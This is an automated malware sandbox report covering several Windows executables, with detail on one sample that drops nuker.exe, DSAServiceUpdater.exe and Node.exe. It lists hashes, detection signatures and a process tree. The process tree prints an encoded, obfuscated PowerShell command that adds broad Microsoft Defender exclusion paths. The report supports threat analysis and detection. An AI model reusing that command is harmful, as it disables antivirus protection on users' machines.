Overview
overview
10Static
static
1055b3d90596...38.exe
windows7-x64
1055b3d90596...38.exe
windows10-2004-x64
1055bc6e4a24...7e.exe
windows7-x64
855bc6e4a24...7e.exe
windows10-2004-x64
855be056b62...2f.exe
windows7-x64
1055be056b62...2f.exe
windows10-2004-x64
1055c90346c1...7d.exe
windows7-x64
755c90346c1...7d.exe
windows10-2004-x64
755e68f668a...36.exe
windows7-x64
1055e68f668a...36.exe
windows10-2004-x64
105600890872...c9.exe
windows7-x64
15600890872...c9.exe
windows10-2004-x64
1563d48f590...69.exe
windows7-x64
7563d48f590...69.exe
windows10-2004-x64
756583e9f6e...61.exe
windows7-x64
1056583e9f6e...61.exe
windows10-2004-x64
10569bb28f26...62.exe
windows7-x64
7569bb28f26...62.exe
windows10-2004-x64
756a0fe7669...54.exe
windows7-x64
1056a0fe7669...54.exe
windows10-2004-x64
1056bf03053c...ec.exe
windows7-x64
1056bf03053c...ec.exe
windows10-2004-x64
1056f180528b...73.exe
windows7-x64
1056f180528b...73.exe
windows10-2004-x64
105737ca76a6...88.exe
windows7-x64
105737ca76a6...88.exe
windows10-2004-x64
10575bc86968...a1.exe
windows7-x64
7575bc86968...a1.exe
windows10-2004-x64
757d8199712...1f.exe
windows7-x64
1057d8199712...1f.exe
windows10-2004-x64
57f8be0d4c...5a.exe
windows7-x64
1057f8be0d4c...5a.exe
windows10-2004-x64
10Analysis
-
max time kernel
120s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20250207-en -
resource tags
arch:x64arch:x86image:win7-20250207-enlocale:en-usos:windows7-x64system -
submitted
22/03/2025, 06:11
Behavioral task
behavioral1
Sample
55b3d9059616b5aefb891d6c73e91acc1479e9b151684a2663ee031c71fb1538.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
55b3d9059616b5aefb891d6c73e91acc1479e9b151684a2663ee031c71fb1538.exe
Resource
win10v2004-20250314-en
Behavioral task
behavioral3
Sample
55bc6e4a240651d4266ea63bd771337e.exe
Resource
win7-20250207-en
Behavioral task
behavioral4
Sample
55bc6e4a240651d4266ea63bd771337e.exe
Resource
win10v2004-20250314-en
Behavioral task
behavioral5
Sample
55be056b6277768f3344436f323aca62fe5baaf572f804f9e32e9edc48c4802f.exe
Resource
win7-20240903-en
Behavioral task
behavioral6
Sample
55be056b6277768f3344436f323aca62fe5baaf572f804f9e32e9edc48c4802f.exe
Resource
win10v2004-20250314-en
Behavioral task
behavioral7
Sample
55c90346c1106def94ce35242b780bd012609ce24c49a356c804a4689701af7d.exe
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
55c90346c1106def94ce35242b780bd012609ce24c49a356c804a4689701af7d.exe
Resource
win10v2004-20250314-en
Behavioral task
behavioral9
Sample
55e68f668a9bc6872ae937e6ffb74136.exe
Resource
win7-20240903-en
Behavioral task
behavioral10
Sample
55e68f668a9bc6872ae937e6ffb74136.exe
Resource
win10v2004-20250314-en
Behavioral task
behavioral11
Sample
5600890872cfada0e85b0d33ada4d88b2a0c359fb3cc5300d70bb0a1575e19c9.exe
Resource
win7-20241010-en
Behavioral task
behavioral12
Sample
5600890872cfada0e85b0d33ada4d88b2a0c359fb3cc5300d70bb0a1575e19c9.exe
Resource
win10v2004-20250314-en
Behavioral task
behavioral13
Sample
563d48f59066cea184f9ca9c8e116af85f627335f9e38749e10b9f5a8224e469.exe
Resource
win7-20250207-en
Behavioral task
behavioral14
Sample
563d48f59066cea184f9ca9c8e116af85f627335f9e38749e10b9f5a8224e469.exe
Resource
win10v2004-20250314-en
Behavioral task
behavioral15
Sample
56583e9f6e3105d594f0451658686110a1f68b5fb285057148d1b3c6d087bb61.exe
Resource
win7-20240903-en
Behavioral task
behavioral16
Sample
56583e9f6e3105d594f0451658686110a1f68b5fb285057148d1b3c6d087bb61.exe
Resource
win10v2004-20250314-en
Behavioral task
behavioral17
Sample
569bb28f26e0170d21d0f5788a4ee262.exe
Resource
win7-20250207-en
Behavioral task
behavioral18
Sample
569bb28f26e0170d21d0f5788a4ee262.exe
Resource
win10v2004-20250314-en
Behavioral task
behavioral19
Sample
56a0fe76690153775e7d0af4698d0ef50c369cf078079269825f53cf2eec5b54.exe
Resource
win7-20240903-en
Behavioral task
behavioral20
Sample
56a0fe76690153775e7d0af4698d0ef50c369cf078079269825f53cf2eec5b54.exe
Resource
win10v2004-20250314-en
Behavioral task
behavioral21
Sample
56bf03053c6a58211b3bb060862ea7ec.exe
Resource
win7-20240903-en
Behavioral task
behavioral22
Sample
56bf03053c6a58211b3bb060862ea7ec.exe
Resource
win10v2004-20250314-en
Behavioral task
behavioral23
Sample
56f180528b74e418299dd53d17305073.exe
Resource
win7-20241010-en
Behavioral task
behavioral24
Sample
56f180528b74e418299dd53d17305073.exe
Resource
win10v2004-20250314-en
Behavioral task
behavioral25
Sample
5737ca76a64d47bb4cca4745520c6e536f4b8360502070dfdacbd4ba1bb6ae88.exe
Resource
win7-20241010-en
Behavioral task
behavioral26
Sample
5737ca76a64d47bb4cca4745520c6e536f4b8360502070dfdacbd4ba1bb6ae88.exe
Resource
win10v2004-20250314-en
Behavioral task
behavioral27
Sample
575bc86968dd39f1d1c96d337977010b47d6617890d54c1a0a4d0fee013be6a1.exe
Resource
win7-20240903-en
Behavioral task
behavioral28
Sample
575bc86968dd39f1d1c96d337977010b47d6617890d54c1a0a4d0fee013be6a1.exe
Resource
win10v2004-20250314-en
Behavioral task
behavioral29
Sample
57d8199712f6f26f823f126d36745bb96fdec8d3ea2cb92b42b655a8adbba21f.exe
Resource
win7-20250207-en
Behavioral task
behavioral30
Sample
57d8199712f6f26f823f126d36745bb96fdec8d3ea2cb92b42b655a8adbba21f.exe
Resource
win10v2004-20250314-en
Behavioral task
behavioral31
Sample
57f8be0d4c7021dd7b09ec4eff55e6803ca1f11b7bb4935319b4ee8c70034b5a.exe
Resource
win7-20240903-en
Behavioral task
behavioral32
Sample
57f8be0d4c7021dd7b09ec4eff55e6803ca1f11b7bb4935319b4ee8c70034b5a.exe
Resource
win10v2004-20250314-en
General
-
Target
563d48f59066cea184f9ca9c8e116af85f627335f9e38749e10b9f5a8224e469.exe
-
Size
12.4MB
-
MD5
597dbb425d3fdbfcd96cfb7f0f447eda
-
SHA1
34f05cd0cdaca3015e2f6e3fd24ef460f1c0c037
-
SHA256
563d48f59066cea184f9ca9c8e116af85f627335f9e38749e10b9f5a8224e469
-
SHA512
75994ed55a09539f556f31442dd7ad838a1484466e2ab396b36d017f8fbc28bd0c052c17c0d74376d4e92837d1a4e6d97ec8190ad6ee0a1f8d5a8d6e6acc63bd
-
SSDEEP
393216:uTmEkeTbTQC4x2FVSRsWBWlBOBum5xo+s:GjTnxVRIFDzoD
Malware Config
Signatures
-
.NET Reactor proctector 4 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral13/files/0x00050000000192eb-17.dat net_reactor behavioral13/memory/2836-21-0x0000000000F50000-0x0000000000F8C000-memory.dmp net_reactor behavioral13/memory/3000-29-0x0000000000390000-0x00000000003CC000-memory.dmp net_reactor behavioral13/files/0x0005000000019336-28.dat net_reactor -
Executes dropped EXE 4 IoCs
pid Process 2840 nuker.exe 2836 DSAServiceUpdater.exe 3000 Node.exe 672 nuker.exe -
Loads dropped DLL 15 IoCs
pid Process 688 563d48f59066cea184f9ca9c8e116af85f627335f9e38749e10b9f5a8224e469.exe 688 563d48f59066cea184f9ca9c8e116af85f627335f9e38749e10b9f5a8224e469.exe 688 563d48f59066cea184f9ca9c8e116af85f627335f9e38749e10b9f5a8224e469.exe 2840 nuker.exe 672 nuker.exe 1044 WerFault.exe 1704 WerFault.exe 1044 WerFault.exe 1704 WerFault.exe 1044 WerFault.exe 1704 WerFault.exe 1044 WerFault.exe 1704 WerFault.exe 1704 WerFault.exe 1044 WerFault.exe -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Detects Pyinstaller 1 IoCs
resource yara_rule behavioral13/files/0x0007000000004e74-12.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2640 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2640 powershell.exe Token: SeDebugPrivilege 3000 Node.exe Token: SeDebugPrivilege 2836 DSAServiceUpdater.exe -
Suspicious use of WriteProcessMemory 21 IoCs
description pid Process procid_target PID 688 wrote to memory of 2640 688 563d48f59066cea184f9ca9c8e116af85f627335f9e38749e10b9f5a8224e469.exe 30 PID 688 wrote to memory of 2640 688 563d48f59066cea184f9ca9c8e116af85f627335f9e38749e10b9f5a8224e469.exe 30 PID 688 wrote to memory of 2640 688 563d48f59066cea184f9ca9c8e116af85f627335f9e38749e10b9f5a8224e469.exe 30 PID 688 wrote to memory of 2840 688 563d48f59066cea184f9ca9c8e116af85f627335f9e38749e10b9f5a8224e469.exe 32 PID 688 wrote to memory of 2840 688 563d48f59066cea184f9ca9c8e116af85f627335f9e38749e10b9f5a8224e469.exe 32 PID 688 wrote to memory of 2840 688 563d48f59066cea184f9ca9c8e116af85f627335f9e38749e10b9f5a8224e469.exe 32 PID 688 wrote to memory of 2836 688 563d48f59066cea184f9ca9c8e116af85f627335f9e38749e10b9f5a8224e469.exe 34 PID 688 wrote to memory of 2836 688 563d48f59066cea184f9ca9c8e116af85f627335f9e38749e10b9f5a8224e469.exe 34 PID 688 wrote to memory of 2836 688 563d48f59066cea184f9ca9c8e116af85f627335f9e38749e10b9f5a8224e469.exe 34 PID 688 wrote to memory of 3000 688 563d48f59066cea184f9ca9c8e116af85f627335f9e38749e10b9f5a8224e469.exe 35 PID 688 wrote to memory of 3000 688 563d48f59066cea184f9ca9c8e116af85f627335f9e38749e10b9f5a8224e469.exe 35 PID 688 wrote to memory of 3000 688 563d48f59066cea184f9ca9c8e116af85f627335f9e38749e10b9f5a8224e469.exe 35 PID 2840 wrote to memory of 672 2840 nuker.exe 36 PID 2840 wrote to memory of 672 2840 nuker.exe 36 PID 2840 wrote to memory of 672 2840 nuker.exe 36 PID 3000 wrote to memory of 1044 3000 Node.exe 38 PID 3000 wrote to memory of 1044 3000 Node.exe 38 PID 3000 wrote to memory of 1044 3000 Node.exe 38 PID 2836 wrote to memory of 1704 2836 DSAServiceUpdater.exe 37 PID 2836 wrote to memory of 1704 2836 DSAServiceUpdater.exe 37 PID 2836 wrote to memory of 1704 2836 DSAServiceUpdater.exe 37
Processes
-
C:\Users\Admin\AppData\Local\Temp\563d48f59066cea184f9ca9c8e116af85f627335f9e38749e10b9f5a8224e469.exe"C:\Users\Admin\AppData\Local\Temp\563d48f59066cea184f9ca9c8e116af85f627335f9e38749e10b9f5a8224e469.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:688 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AcQBzACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAeQBtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHMAbgBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQAYgBrACMAPgA="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2640
-
-
C:\Users\Admin\AppData\Local\nuker.exe"C:\Users\Admin\AppData\Local\nuker.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2840 -
C:\Users\Admin\AppData\Local\nuker.exe"C:\Users\Admin\AppData\Local\nuker.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:672
-
-
-
C:\Users\Admin\AppData\Local\DSAServiceUpdater.exe"C:\Users\Admin\AppData\Local\DSAServiceUpdater.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2836 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2836 -s 6243⤵
- Loads dropped DLL
PID:1704
-
-
-
C:\Users\Admin\AppData\Local\Node.exe"C:\Users\Admin\AppData\Local\Node.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3000 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3000 -s 6243⤵
- Loads dropped DLL
PID:1044
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
225KB
MD5181994193a41a2237c9f03bd05fa05e8
SHA10580f732a6cec33037d7f9ab94af781c8cc1374d
SHA25631e059406bdd39e02d4b160eacdc23e850630763558f0c74b3f0a29f90fb602f
SHA51245fa74b23c18c6c0605374780d761e442fb23b314e971f728ec15d411bcabd4d7947b8be6d5141c206b12535a484c33b4c81d2154f8d3c48329cc4aed91480de
-
Filesize
4.3MB
MD564fde73c54618af1854a51db302192fe
SHA1c5580dcea411bfed2d969551e8089aab8285a1d8
SHA256d44753fe884b228da36acb17c879b500aeb0225a38fb7ca142fb046c60b22204
SHA512a7d368301a27ee07a542e45e9ad27683707979fb198b887b66b523609f69e3327d4b77b7edc988c73a4fe26c44bff3abfcd032a991cd730fd8e0de2dad2e3a06
-
Filesize
222KB
MD570fa96bb8c3fe5a7627319edae1f1ef5
SHA11dec9e8abddbfdb636b6f648fa13331a959aca0a
SHA256bac55448c69532136a59db47212bb9cec775276f5d673afa1df865f11f77df5f
SHA512b606e7aa69280d688f979cd4409be235228de2ca9cd0df3796aef6caaa5c727645757ec4dbeee9ed72929f698490bfc75e66becf16cb71d8aea4efb403509ea8
-
Filesize
11.9MB
MD54e92ec59842a81a9928f3518b0bcd1ca
SHA1516fc5b9f5cd1821f2897c2abd9850fcf6fe278d
SHA256e8838599e4c50e8e213e87dea7ea65b841df51ca2f50053b7a6800f4449bd5fa
SHA512d66635486e571fb8a44f685766ce515a605ded953a5769da850d17e45f86874d242b7e5009ac527fc69ccfb9b0d773184165689615c097a847ed99f618d0e738